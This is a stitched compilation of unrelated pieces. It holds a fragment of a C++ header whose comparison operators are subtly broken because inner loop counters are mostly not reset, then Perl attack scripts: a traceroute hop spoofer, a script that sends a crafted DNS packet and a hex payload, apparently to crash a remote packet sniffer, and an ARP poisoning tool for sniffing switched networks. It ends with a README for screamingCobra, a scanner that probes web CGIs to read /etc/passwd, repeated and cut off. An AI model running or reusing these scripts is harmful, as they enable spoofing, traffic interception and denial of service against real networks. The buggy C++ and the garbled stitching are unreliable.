- if (data[i] > x)
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator>(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] > x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
- if (data[i] <= x)
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator<(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] < x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
- if (data[i] >= x)
- return false;
- return true;
- }
- return false;
- }
- // END OF OVERLOADED OPERATORS (Quantum ? Double)
- // BEGINNING OF OVERLOADED OPERATORS (Quantum ? Quantum)
- bool Quantum::operator==(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] == x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- {
- bool success = true;
- for (; j < x.data.size(); j++)
- if (data[i] != x.data[j])
- success = false;
- if (success == true)
- return true;
- }
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] == x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] != x.data[j])
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator!=(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] != x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] != x.data[j])
- return true;
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] != x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] == x.data[j])
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator<=(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] <= x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] <= x.data[j])
- return true;
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] <= x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] > x.data[j])
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator>=(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] >= x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] >= x.data[j])
- return true;
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] >= x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] < x.data[j])
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator<(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] < x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] < x.data[j])
- return true;
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] < x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (j = 0; j < x.data.size(); j++)
- if (data[i] >= x.data[j])
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator>(Quantum x)
- {
- register int i = 0, j = 0;
- // any()
- if (type == true)
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] > x.data[j])
- return true;
- return false;
- }
- // x.all()
- else
- {
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] > x.data[j])
- return true;
- return false;
- }
- }
- // all()
- else
- {
- // x.any()
- if (x.type == true)
- {
- for (; i < data.size(); i++)
- {
- bool success = false;
- for (; j < x.data.size(); j++)
- if (data[i] > x.data[j])
- success = true;
- if (success == false)
- return false;
- }
- return true;
- }
- // x.all()
- else
- for (; i < data.size(); i++)
- for (; j < x.data.size(); j++)
- if (data[i] <= x.data[j])
- return false;
- return true;
- }
- return false;
- }
- // END OF OVERLOADED OPERATORS (Quantum ? Quantum)
- #endif QUANTUM_H_
- #!/usr/bin/perl
- # traceroute hop spoofer!
- # -samy [cp5@LucidX.com]
- use Packet::Inject;
- use Packet::IP;
- use Packet::Ethernet;
- use Packet::ICMP;
- use Packet::Definitions;
- use Packet::Lookup;
- use Packet::Sniff;
- use strict;
- die "usage: $0 <spoof 1> <spoof 2> ...\n" unless my @spoofs = @ARGV;
- my $len = pack('I', 0);
- my @mib = (
- &Packet::Definitions::CTL_NET,
- &Packet::Definitions::AF_ROUTE,
- 0,
- &Packet::Definitions::AF_LINK,
- &Packet::Definitions::NET_RT_IFLIST,
- 0
- );
- my $mib = pack('iiiiii', @mib);
- syscall(&Packet::Definitions::SYS___sysctl, $mib, 6, 0, $len, 0, 0);
- my $buf = pack('a' . unpack('I', $len), '');
- syscall(&Packet::Definitions::SYS___sysctl, $mib, 6, $buf, $len, 0, 0);
- my ($device) = ($buf =~ /.*?(\w{2,5}\d+)/);
- # convert hosts to ip now to save time when sending packets
- foreach (@spoofs) {
- $_ = quad2int(&Packet::Lookup::host_to_ip($_));
- }
- my $id = int(rand(2 ** 16));
- my $total = @spoofs;
- my $ethernet = Packet::Ethernet->new();
- my $ip = Packet::IP ->new();
- my $inject = Packet::Inject ->new(device => $device);
- my $sniff = Packet::Sniff ->new(device => $device);
- my $sendeth = Packet::Ethernet->new(
- type => 0x0800,
- );
- $inject->open() || die $inject->{errbuf};
- $sniff ->open() || die $inject->{errbuf};
- $sniff ->loop(0, \&parse, $total);
- sub parse {
- my ($total, $hdr, $packet, $s) = @_;
- my ($sendip, $sendicmp);
- $ethernet->decode($packet);
- return unless $ethernet->type == 0x0800;
- $ip->decode($ethernet->data);
- return unless $ip->ttl <= ($total + 1);
- $sendeth->{dest_mac} = $ethernet->src_mac;
- # this is where we send the final packet and get device name
- if ($ip->ttl == $total + 1) {
- $sendicmp = Packet::ICMP->new(
- type => &Packet::ICMP::ICMP_DEST_UNREACH,
- code => &Packet::ICMP::ICMP_PORT_UNREACH,
- data => "\0" x 4 . substr($ip->encode, 0, 28),
- );
- $sendip = Packet::IP->new(
- src_ip => $ip->dest_ip,
- dest_ip => $ip->src_ip,
- id => $id++,
- proto => 1,
- data => $sendicmp,
- );
- $inject->write(packet => $sendeth . $sendip);
- print "Port Unreachable sent to " . int2quad($ip->src_ip) . "\n";
- }
- else {
- $sendicmp = Packet::ICMP->new(
- type => &Packet::ICMP::ICMP_TIME_EXCEED,
- code => &Packet::ICMP::ICMP_TTL_EXCEED,
- data => "\0" x 4 . substr($ip->encode, 0, 28),
- );
- $sendip = Packet::IP->new(
- src_ip => $spoofs[$ip->ttl-1],
- dest_ip => $ip->src_ip,
- id => $id++,
- proto => 1,
- data => $sendicmp,
- );
- $inject->write(packet => $sendeth . $sendip);
- print "Time Exceeded In Transit sent to " . int2quad($ip->src_ip) .
- " from " . int2quad($spoofs[$ip->ttl-1]) . "\n";
- }
- }
- sub quad2int
- {
- my $val = shift;
- my $counter = 3;
- my $i;
- my $result;
- for my $i (split/\./, $val) {
- $result += $i * 256 ** $counter--;
- }
- return ($result);
- }
- sub int2quad
- {
- my $val = shift;
- my $result;
- if ($val =~ /^\d+$/) {
- $result = join('.', unpack("C4", pack('N', $val)));
- }
- return ($result);
- }
- #!/usr/bin/perl
- use IO::Socket;
- unless (@ARGV == 2) {
- die "usage: $0 <host to kill sniffs> <host with open port 80 [that host can sniff]>\n";
- }
- $tcpd1 = "eea600000001000000000000c00c00010001";
- $urls1 =~ s/\s//g;
- $urls2 = "GET / HTTP/1.0\nHost: do.not.enter.LucidX.com\n\n";
- $sock = IO::Socket::INET->new(
- PeerAddr => "do.not.enter.LucidX.com",
- PeerPort => 80,
- Proto => "tcp",
- ) or print STDERR "Can't open socket: $!\n";
- print $sock $urls2;
- close($sock);
- $sock = IO::Socket::INET->new(
- PeerAddr => $ARGV[0],
- PeerPort => 53,
- Proto => "udp",
- ) or print STDERR "Can't open socket: $!\n";
- print $sock pack("H*", $tcpd1);
- close($sock);
- $sock = IO::Socket::INET->new(
- PeerAddr => $ARGV[1],
- PeerPort => 80,
- Proto => "tcp",
- ) or print STDERR "Can't open socket: $!\n";
- print $sock pack("H*", $urls1);
- close($sock);
- BEGIN {
- $urls1 = "
- 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f
- 64 6f 6e 6f 74 67 6f 74 6f 2e 4c 75 63 69 64 58
- 2e 63 6f 6d 0d 0a 0d 0a 00 00 00 00 8b 00 00 00
- 00 00 00 00 53 05 00 00 ba 03 00 00 0e 05 00 00
- e5 04 00 00 19 01 00 00 24 03 00 00 00 00 00 00
- ce 04 00 00 d0 05 00 00 b8 04 00 00 65 04 00 00
- 32 04 00 00 ca 05 00 00 0d 01 00 00 3b 06 00 00
- 01 01 00 00 3a 06 00 00 a0 01 00 00 89 04 00 00
- 00 00 00 00 8a 01 00 00 db 01 00 00 00 00 00 00
- d8 01 00 00 3d 03 00 00 4f 04 00 00 66 05 00 00
- 00 00 00 00 2a 00 00 00 26 06 00 00 1d 05 00 00
- 6b 02 00 00 d3 04 00 00 6b 05 00 00 fe 05 00 00
- 93 05 00 00 d6 01 00 00 c7 02 00 00 5d 03 00 00
- 95 04 00 00 00 00 00 00 50 00 00 00 56 03 00 00
- 00 00 00 00 1e 01 00 00 fa 03 00 00 cc 01 00 00
- b7 00 00 00 d2 05 00 00 3c 03 00 00 00 00 00 00
- bf 04 00 00 00 00 00 00 00 00 00 00 8b 05 00 00
- c3 03 00 00 00 00 00 00 01 05 00 00 a6 05 00 00
- ae 05 00 00 00 00 00 00 9f 03 00 00 84 04 00 00
- 0b 04 00 00 5a 02 00 00 d0 04 00 00 96 05 00 00
- 1b 05 00 00 f0 02 00 00 11 06 00 00 72 00 00 00
- 7a 01 00 00 22 02 00 00 00 00 00 00 c1 03 00 00
- fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 58 00 00 00 7f 00 00 00 00 00 00 00 cd 03 00 00
- c0 02 00 00 8e 03 00 00 08 05 00 00 26 00 00 00
- 00 00 00 00 8f 04 00 00 00 00 00 00 a8 05 00 00
- 42 05 00 00 3f 04 00 00 7f 03 00 00 a4 03 00 00
- 12 04 00 00 d3 00 00 00 a3 03 00 00 45 06 00 00
- 44 02 00 00 09 06 00 00 52 04 00 00 1b 06 00 00
- 00 05 00 00 56 04 00 00 00 00 00 00 f2 02 00 00
- 16 05 00 00 00 00 00 00 e9 05 00 00 7d 05 00 00
- 33 05 00 00 c5 00 00 00 77 04 00 00 0b 02 00 00
- fc 04 00 00 e1 02 00 00 c3 04 00 00 06 06 00 00
- a1 03 00 00 e0 02 00 00 36 01 00 00 00 00 00 00
- 72 01 00 00 b3 d8 04 28 ce fa 06 28 ce fa 06 28
- f3 03 00 00 62 d8 04 28 c8 b2 05 28 20 00 06 28
- 00 00 00 00 00 00 00 00 e3 04 00 00 20 00 06 00
- 7c fa bf bf 0f d8 04 28 ce fa 06 28 47 b7 a1 0a
- 00 e1 05 28 00 00 00 00 c8 b2 05 28 e0 4b 0e 28
- ce fa 06 28 00 00 00 00 67 05 00 00 f8 00 00 00
- da 02 00 00 00 00 00 00 00 e1 05 28 00 00 00 00
- ec fa bf bf 4b d6 04 28 ce fa 06 28 47 b7 a1 0a
- e8 a1 05 28 dc fa bf bf b3 d8 04 28 1c 84 04 08
- 93 d1 06 28 7e e8 04 28 62 d8 04 28 c8 b2 05 28
- 20 00 06 28 00 00 00 00 c8 b2 05 28 80 b7 05 28
- 20 00 06 01 00 fb bf bf 0f d8 04 28 1c 84 04 08
- 04 cf 8a 06 00 e1 05 28 01 00 00 00 c8 b2 05 28
- 00 e0 05 28 1c 84 04 08 02 00 00 00 02 00 00 00
- 1c fb bf bf 65 c9 04 28 08 00 00 00 00 e1 05 28
- 03 00 00 01 70 fb bf bf 4b d6 04 28 1c 84 04 08
- 04 cf 8a 06 e8 a1 05 28 60 fb bf bf 01 00 00 00
- 64 fb bf bf 6b c4 04 28 f0 a1 05 28 00 e0 05 28
- 00 e1 05 28 ea c3 04 28 8e d5 04 28 c8 b2 05 28
- 00 e0 05 28 1c 84 04 08 04 00 00 00 80 b7 05 28
- 7c fb bf bf 01 69 07 28 00 e1 05 28 ec b3 06 28
- f8 fb bf 01 00 e1 05 28 28 fb bf bf 02 00 00 00
- 02 00 00 00 d0 fb bf bf 36 c0 04 28 1c 84 04 08
- 04 cf 8a 06 00 e0 05 28 cc fb bf bf 01 00 00 00
- 00 e0 05 28 d0 fb bf bf 16 c0 04 28 1c 84 04 08
- 00 00 00 00 a4 df 04 28 ea bf 04 28 c8 b2 05 28
- 00 e0 05 28 78 9b 04 08 bd de 04 28 c8 b2 05 28
- 00 e0 05 28 aa b8 04 28 30 83 04 08 c8 b2 05 01
- 00 e1 05 28 00 fc bf bf 6e b9 04 28 00 20 06 28
- 00 e0 05 28 fc fb bf bf 01 00 00 00 02 00 00 00 ";
- }
- #!/usr/bin/perl
- # ARPredir.pl - by Samy Kamkar [CommPort5@LucidX.com]
- # requires Packet (by Samy Kamkar and David Hulton)
- # this will arp poisen a host (all hosts by default) on a local network
- # and will allow you to sniff a specific host on your network without
- # even enabling promiscuous mode on your ethernet device, and this will
- # even work if the network is switched (that's the main purpose)
- # offset is usually 78 or 80 for openbsd and 94 for freebsd
- # usage: ./arpredir.pl [-t target] [-i device] offset host
- use Packet::Device; # module for getting local net interface and network info
- use Packet::Lookups; # module for converting values
- use Packet::Inject; # module for creating and sending packets
- use Packet::Inject::ARP; # module for creating an ARP header
- use Packet::Inject::Ethernet; # module for creating an ethernet header
- $SIG{INT} = \&exit; # when exiting go to &exit to fix the arp cache tables
- my ($off, $host, $dev, $targ) = &begin; # get arguements
- unless ($targ) { # target not specified
- $targ = "255.255.255.255"; # target will default to broadcast
- $arp{tpa} = "00000000";
- }
- else {
- $arp{tpa} = $targ;
- }
- unless ($dev) { # no device specified
- $dev = if_dev(); # figure out main network device
- }
- $eth{src} = dev2mac($dev); # always your local mac
- $eth{dst} = ip2mac($off, $targ); # always the target ip's mac [broadcast unless def'd with -t]
- $arp{tha} = $eth{dst}; # always the target ip's mac [broadcast unless def'd with -t]
- $arp{sha} = $eth{src}; # the mac that should receieve the data [at first, yours]
- $arp{spa} = $host; # the ip that should be assigned to your mac [def'd by <host>]
- $arp{dmc} = ip2mac($off, $host); # the original mac address of the ip
- $pkt = new Packet::Inject( # create a new packet object
- ETHERNET => { # Ethernet header
- dest_mac => "ff:ff:ff:ff:ff:ff", # dest mac
- src_mac => $eth{src}, # sourc mac
- },
- ARP => { # ARP header
- opcode => 1, # ARP who-has
- tha => "00:00:00:00:00:00", # dest mac (repeated)
- sha => $arp{sha}, # source mac (repeated)
- spa => if_addr($dev), # your real ip
- tpa => $arp{spa}, # the host's ip
- }
- );
- unless ($eth{dst}) { # target wasn't in the arp cache table
- $pkt->send(1, $dev); # send the packet once
- }
- unless ($arp{dmc}) { # host wasn't in the arp cache table
- $pkt->send(1, $dev); # send the packet once
- }
- if (!$eth{dst} or !$arp{dmc}) { # one, or even both, of the macs weren't found
- $eth{dst} = ip2mac($off, $targ); # retrieve proper mac
- $arp{dmc} = ip2mac($off, $host); # get new host mac
- $arp{tha} = $eth{dst}; # reset the value to what it should be
- }
- $pkt->{ETHERNET}{dest_mac} = $eth{dst}; # change dest mac to new dest mac
- $pkt->{ARP}{opcode} = 2; # ARP is-at
- $pkt->{ARP}{tha} = $arp{tha}; # dest mac (repeated)
- $pkt->{ARP}{spa} = $arp{spa}; # the ip that our mac address is pretending to be
- $pkt->{ARP}{tpa} = $arp{tpa}; # the ip that should get the arps
- while (1) { # infinite loop until SIGINT is called
- $pkt->send(1, $dev); # send packet
- print "$arp{sha} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{sha}\n";
- sleep 2; # wait 2 seconds
- }
- sub exit { # SIGINT has been called
- $SIG{INT} = sub { }; # make sure SIGINT doesn't do anything anymore
- $pkt->{ARP}{sha} = $arp{dmc}; # reroute the ip to the correct mac address
- foreach (1 .. 2) { # loop twice for 2 packets
- $pkt->send(1, $dev); # send packet
- print "$arp{dmc} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{dmc}\n";
- sleep 1; # wait a second
- }
- $pkt->send(1, $dev); # send another (and last) packet and die
- die "$arp{dmc} $arp{tha} 0806 42: arp reply $arp{spa} is-at $arp{dmc}\n";
- }
- sub error {
- print "offsets:\n\topenbsd: 78 or 80\n\tfreebsd: 94\n\tlinux: unknown to the human race for all it's worth\n";
- die "usage: $0 [-t target] [-i device] offset host\n"; # incorrect arguements called
- }
- sub begin {
- if (@ARGV < 1 or @ARGV > 5) {
- &error;
- }
- my $host = pop(@ARGV);
- my $off = pop(@ARGV);
- my ($dev, $targ);
- for ($i = 0; $i < @ARGV; $i++) {
- if ($ARGV[$i] =~ /^[^-]/ and $ARGV[$i-1] =~ /^[^-]/) {
- &error;
- }
- if ($ARGV[$i] =~ /^-/) {
- if ($ARGV[$i] =~ /^-([a-z]+)$/i) {
- if ($1 eq 'i') {
- $dev = $ARGV[$i+1];
- }
- elsif ($1 eq 't') {
- $targ = $ARGV[$i+1];
- }
- }
- else {
- &error;
- }
- }
- }
- return($off, $host, $dev, $targ);
- }
- screamingCobra - automated remote CGI vulnerability discovery
- Welcome to cobra.LucidX.com! screamingCobra is an application that does automated vulnerability scanning in remote CGIs by using techniques that are able to spot very common bugs in many CGIs, usually when dealing with templates or any other files or applications. screamingCobra was written by Samy Kamkar, originally at Caezar's Challenge V at DefCon, but rewritten completely with numerous feature additions (previously known as crawl5b). Check the manual page for more information!
- ________________________________________
- News - January 12th, 2002
- This site is put up and I've set up a mailing list to go with it. Submit your email address at the bottom left to subscribe to the mailing list or send an email to majordomo@LucidX.com with the body containing 'subscribe cobra'.
- ________________________________________
- screamingCobra's Manual
- A read-me on how to use screamingCobra, what it does, all of its options, etc..
- Download screamingCobra
- You can get all the downloads from here such as the stable version, development version, and even specific files out of a certain version. For the stable version, get CURRENT.tar.gz.
- Changes
- You can see all the changes made with all of the versions of screamingCobra here, including changes in the development version!
- http://www.samy.pl/scobra/
- Index of /scobra/downloads/screamingCobra-1.04
- Name
- Last modified
- Size
- Description
- ________________________________________
- Parent Directory
- -
- LICENSE
- 13-Jan-2002 05:23 1.4K
- README
- 13-Jan-2002 05:39 7.6K
- TODO
- 13-Jan-2002 05:23 163
- changeLog
- 13-Jan-2002 05:23 632
- sCobra-WIN.exe
- 13-Jan-2002 05:23 784K
- screamingCobra.pl
- 22-Jan-2002 23:44 9.9K
- ________________________________________
- screamingCobra v1.04 -- < January 12, 2002 >
- by Samy Kamkar [commport5@LucidX.com]
- usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]
- =======================
- == TABLE OF CONTENTS ==
- =======================
- 1. What is screamingCobra
- 2. What screamingCobra does
- 3. Why was screamingCobra written
- 4. Configuring screamingCobra
- A. Basic Configuration
- B. Adding Techniques
- 5. Command-line options
- 6. Supported Operating Systems
- =======================
- _____________________________
- 1. __ WHAT IS SCREAMING COBRA __
- =============================
- Any CGI that doesn't check arguements that are passed to it
- over the web are possibly vulnerable to attacks which allow
- a malicious user get read access to almost any file on that
- system, if not access to execute programs. screamingCobra
- is almost always able to find those bugs REMOTELY due to
- the common errors programmers make.
- screamingCobra is an application for remote vulnerability
- discovery in ANY UNKNOWN web applications such as CGIs and PHP
- pages. Simply put, it attemps to find vulernabilities in all
- web applications on a host without knowing anything about the
- applications. Modern CGI scanners scan a host for CGIs
- with known vulnerabilities. screamingCobra is able to 'find'
- the actual vulnerabilities in ANY CGI, whether it has been
- discovered before or not.
- _______________________________
- 2. __ WHAT SCREAMING COBRA DOES __
- ===============================
- I've even been told by administrators of very well known
- sites that they've been able to use screamingCobra (originally
- called crawl5b, before this release) and find at least one
- bug which allows anyone to get read access to almost any file
- on the system, if not access to execute applications. When
- you launch screamingCobra, it crawls the specified host
- over the web and attempts to find all the CGIs or any other
- applications where parameters can be passed. It then attempts
- to use a few techniques to read files on that machine. By
- default, it attempts to read /etc/passwd, and if successful it
- will display the URL in which it used to access the file.
- _____________________________________
- 3. __ WHY WAS SCREAMING COBRA WRITTEN __
- =====================================
- The core was originally written at DefCon 9, specifically at
- Caezar's Challeng V, for Challenge B:
- "identify hypothetical cases of common bugs in server-side
- programs and then to describe algorithms that could detect those
- problems from a special version of the client software".
- I did just that, and wrote a program to go along with it.
- Caezar's Challenge: http://caezarschallenge.org
- _________________________________
- 4. __ CONFIGURING SCREAMING COBRA __
- =================================
- A. -- BASIC CONFIGURATION --
- There's not much, if any, configuring to be done.
- Although, there may be some things you want to change.
- I'll go over those now. Open up screamingCobra.pl
- in a text editor and check these lines out:
- Line 29: this is the file it will attempt to access
- change 'etc/passwd' to, say, 'bin/ls' to attempt
- to read /bin/ls.
- I recommend KEEPING /etc/passwd as the default.
- Line 30: this is the additional technique for finding
- vulnerabilities. Leave it alone if you don't know
- what it's doing :)
- Line 32: @first -- this is the HTML tags to look for
- that contain URLs. The array, by default, includes
- 'a' (for <a href's..), 'img' (<img src...), 'body',
- 'area', 'frame' and 'meta'. You may add more, just
- follow the defaults.
- Line 36: @second -- this is the tag options to look
- for inside of a tag, such as 'href' (for <a href..)
- and 'src' (<img src...).
- This will NOT just look at the 2nd word in the tag,
- but any words following a whitespace so it WILL
- catch something like <a blah="" href="...">.
- Line 40: @ignore -- extensions of files to not do a
- GET on, just because they usually don't contain HTML
- and are a waste of bandwidth.
- Line 45: @requests -- this is the basic header that's
- sent to the server when requesting a page or CGI.
- screamingCobra randomly chooses one for each GET it
- does, add more according to the two default ones.
- That's it! You probably didn't have to change anything
- or add anything, but it's good to know how to.
- B. -- ADDING TECHNIQUES --
- Adding techniques and using them is very simple!
- First, find where the '$technique1' variable is set (by
- default, it's at line 29). After all the variables in
- that section that begin with 'technique' and end in a
- number, add a new one, incrementing the number by 1.
- For example, if you have a fresh screamingCobra.pl,
- you would stick in:
- $technique3 = "your technique to be GET'd";
- The 3 is because there are already two other techniques.
- Now to actually be able to use the 3rd technique (and
- all techniques ending with a number less than 3 [2, 1]),
- you must add that many '-e's when running screamingCobra.
- For example, if you wanted to run screamingCobra using
- technique 3, you would run like so:
- ./screamingCobra.pl -eee http://host.name
- You may of course use any other arguements, as well, and
- use whatever host/port/page you want to.
- __________________________
- 5. __ COMMAND-LINE OPTIONS __
- ==========================
- usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]
- -e: EXTRA TECHNIQUES
- Uses multiple techniques to find bugs.
- This will take over twice the amount of time to
- complete a scan and the other techniques used with
- this options are not commonly found in applications
- but if you need to do a very strong pen test, you
- may want to use this option.
- -i: DON'T IGNORE ANY FILES
- In the program, there is a user-configurable array
- of extensions to ignore (not to GET). Those include
- images, compressed files, etc.. This is because those
- files will usually not be HTML pages so there won't
- be any useful data in them, and they may take up a lot
- of bandwidth as well. This option ignores that list
- and screamingCobra will not ignore any files.
- -s: STATUS BAR
- This creates a status bar with constantly updated
- numbers of pages accessed, bugs found and attempted
- vulnerability scans. Cannot be used with verbose,
- although the status bar is ALWAYS displayed when the
- user unexpectedly exits or kills the application (^C)
- or when the application is finished crawling.
- -v: VERBOSE
- This will display all the files being accessed and
- will also list when CGIs are found and attempted to
- be broken (to find vulnerabilities). Cannot be used
- with status bar, although a status bar is ALWAYS
- displayed when the user unexpectedly exits or kills the
- application (^C) or when the application is finished
- crawling.
- <http://host.name>: Hostname or IP of host to scan. [REQUIRED]
- For example, http://cobra.LucidX.com
- [:port]: Port to connect to, default is 80.
- For example, http://cobra.LucidX.com:80
- [/start/page]: Page to start on.
- For example, http://cobra.LucidX.com/screamingCobra-1.03/
- and also, http://cobra.LucidX.com:80/index.html
- __________________________________
- 6. __ SUPPORTED OPERATING SYSTEMS __
- ==================================
- screamingCobra will work on ANY operating system that has
- Perl 5.x.
- I also compiled a binary for
- Windows, sCobra-WIN.exe.
- This will be recompiled for every new version of
- screamingCobra and will be included in all releases.
- ===================
- == END OF README ==
- ===================
- That's all for now.
- Contact me (Samy Kamkar) at commport5@LucidX.com for
- questions or comments, hope to hear from you all! :)
- http://samy.pl/scobra/downloads/screamingCobra-1.04/
- Index of /scobra/downloads/CURRENT
- Name
- Last modified
- Size
- Description
- ________________________________________
- Parent Directory
- -
- LICENSE
- 13-Jan-2002 05:23 1.4K
- README
- 13-Jan-2002 05:39 7.6K
- TODO
- 13-Jan-2002 05:23 163
- changeLog
- 13-Jan-2002 05:23 632
- sCobra-WIN.exe
- 13-Jan-2002 05:23 784K
- screamingCobra.pl
- 22-Jan-2002 23:44 9.9K
- ________________________________________
- screamingCobra v1.04 -- < January 12, 2002 >
- by Samy Kamkar [commport5@LucidX.com]
- usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]
- =======================
- == TABLE OF CONTENTS ==
- =======================
- 1. What is screamingCobra
- 2. What screamingCobra does
- 3. Why was screamingCobra written
- 4. Configuring screamingCobra
- A. Basic Configuration
- B. Adding Techniques
- 5. Command-line options
- 6. Supported Operating Systems
- =======================
- _____________________________
- 1. __ WHAT IS SCREAMING COBRA __
- =============================
- Any CGI that doesn't check arguements that are passed to it
- over the web are possibly vulnerable to attacks which allow
- a malicious user get read access to almost any file on that
- system, if not access to execute programs. screamingCobra
- is almost always able to find those bugs REMOTELY due to
- the common errors programmers make.
- screamingCobra is an application for remote vulnerability
- discovery in ANY UNKNOWN web applications such as CGIs and PHP
- pages. Simply put, it attemps to find vulernabilities in all
- web applications on a host without knowing anything about the
- applications. Modern CGI scanners scan a host for CGIs
- with known vulnerabilities. screamingCobra is able to 'find'
- the actual vulnerabilities in ANY CGI, whether it has been
- discovered before or not.
- _______________________________
- 2. __ WHAT SCREAMING COBRA DOES __
- ===============================
- I've even been told by administrators of very well known
- sites that they've been able to use screamingCobra (originally
- called crawl5b, before this release) and find at least one
- bug which allows anyone to get read access to almost any file
- on the system, if not access to execute applications. When
- you launch screamingCobra, it crawls the specified host
- over the web and attempts to find all the CGIs or any other
- applications where parameters can be passed. It then attempts
- to use a few techniques to read files on that machine. By
- default, it attempts to read /etc/passwd, and if successful it
- will display the URL in which it used to access the file.
- _____________________________________
- 3. __ WHY WAS SCREAMING COBRA WRITTEN __
- =====================================
- The core was originally written at DefCon 9, specifically at
- Caezar's Challeng V, for Challenge B:
- "identify hypothetical cases of common bugs in server-side
- programs and then to describe algorithms that could detect those
- problems from a special version of the client software".
- I did just that, and wrote a program to go along with it.
- Caezar's Challenge: http://caezarschallenge.org
- _________________________________
- 4. __ CONFIGURING SCREAMING COBRA __
- =================================
- A. -- BASIC CONFIGURATION --
- There's not much, if any, configuring to be done.
- Although, there may be some things you want to change.
- I'll go over those now. Open up screamingCobra.pl
- in a text editor and check these lines out:
- Line 29: this is the file it will attempt to access
- change 'etc/passwd' to, say, 'bin/ls' to attempt
- to read /bin/ls.
- I recommend KEEPING /etc/passwd as the default.
- Line 30: this is the additional technique for finding
- vulnerabilities. Leave it alone if you don't know
- what it's doing :)
- Line 32: @first -- this is the HTML tags to look for
- that contain URLs. The array, by default, includes
- 'a' (for <a href's..), 'img' (<img src...), 'body',
- 'area', 'frame' and 'meta'. You may add more, just
- follow the defaults.
- Line 36: @second -- this is the tag options to look
- for inside of a tag, such as 'href' (for <a href..)
- and 'src' (<img src...).
- This will NOT just look at the 2nd word in the tag,
- but any words following a whitespace so it WILL
- catch something like <a blah="" href="...">.
- Line 40: @ignore -- extensions of files to not do a
- GET on, just because they usually don't contain HTML
- and are a waste of bandwidth.
- Line 45: @requests -- this is the basic header that's
- sent to the server when requesting a page or CGI.
- screamingCobra randomly chooses one for each GET it
- does, add more according to the two default ones.
- That's it! You probably didn't have to change anything
- or add anything, but it's good to know how to.
- B. -- ADDING TECHNIQUES --
- Adding techniques and using them is very simple!
- First, find where the '$technique1' variable is set (by
- default, it's at line 29). After all the variables in
- that section that begin with 'technique' and end in a
